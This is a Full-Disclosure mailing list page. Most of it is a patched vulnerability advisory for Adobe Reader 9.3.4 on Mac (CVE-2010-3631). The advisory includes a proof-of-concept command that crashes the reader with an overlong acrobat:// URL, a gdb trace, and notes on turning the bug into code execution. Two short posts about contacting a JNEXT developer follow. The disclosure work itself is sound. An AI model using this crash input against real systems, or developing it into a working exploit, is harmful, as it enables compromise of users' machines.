[Full-disclosure] nSense-2010-001: Adobe Reader for Macintosh
nSense Vulnerability Research Security Advisory NSENSE-2010-001 --- Affected Vendor:Adobe Affected Product: Adobe Reader 9.3.4 for Macintosh Platform: OS X Impact: User assisted code execution Vendor response:Patch Credit: Knud / nSense Technical details --- terminal 1: $ gdb --waitfor=AdobeReader terminal 2: $ open acrobat://`perl -e 'print "A" x 12000'` terminal 1: (gdb) cont [snip] Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2 0x7ffa0d6a in AcroBundleThreadQuitProc () (gdb) set disassembly-flavor intel (gdb) x/i $pc 0x7ffa0d6a : movBYTE PTR [ebp+eax-0x420],0x0 (gdb) i r ebp eax ebp0xbfffe908 0xbfffe908 eax0x2eea 12010 (gdb) As can be seen from the above, we control the value in eax (in this case 12010, the length of the acrobat:// + the 12000 A's). This allows us to write the null byte anywhere in memory between ebp-0x420 (0xBFFFE4E8) and the end of the stack. The behaviour may be leveraged to modify the frame pointer, changing the execution flow and thus permitting arbitrary code execution in the context of the user running the program. Timeline: Aug 10th Contacted vendor PSIRT Aug 10th Vendor response. Vulnerability reproduced. Aug 16th Status update request sent to vendor Aug 17th Vendor response, still investigating Sep 2nd Status update request sent to vendor Sep 3rd Vendor response. Working on fix Sep 22nd Contacted vendor regarding patch date Sep 22nd Vendor response. Confirmed patch date. Sep 23rd Corrected researcher name Oct 1st Vendor sent CVE identifier CVE-2010-3631 Oct 5th Vendor releases the patch Oct 6th Advisory published http://www.nsense.fi http://www.nsense.dk $$ss. ,ss ,S$s. $$ss. ,ss ,S$s. $$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$ $$$ $$$`^$$s. $ $$$ $$$`^$$s. $ $$$ $$$ )$$) $$$$$$ $$$ )$$) $$$ $$$ $$$ ^$$7`7$P $$$ $$$ ^$$7 `7$P D r i v e n b y t h e c h a l l e n g e _ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] JNEXT vulnerability
I say just release it and the will contact you in the future :). On a serious note check the archives maybe the last 4 or so shows back on www.pauldotcom.com. The had a guess on that Developed a free disclosure model to help take these type of stress off of you. Infolookup http://infolookup.securegossip.com www.twitter.com/infolookup -Original Message- From: Blue Bird Sender: full-disclosure-boun...@lists.grok.org.uk Date: Tue, 5 Oct 2010 13:25:37 To: Subject: [Full-disclosure] JNEXT vulnerability ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] JNEXT vulnerability
Hi all - I've been trying to reach the developer of JNEXT for some time now to report a security vulnerability, anyone have contact info for Amnon David other than the webform on his website? http://www.jnext.org/sphp501/contact.php Thanks. BB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
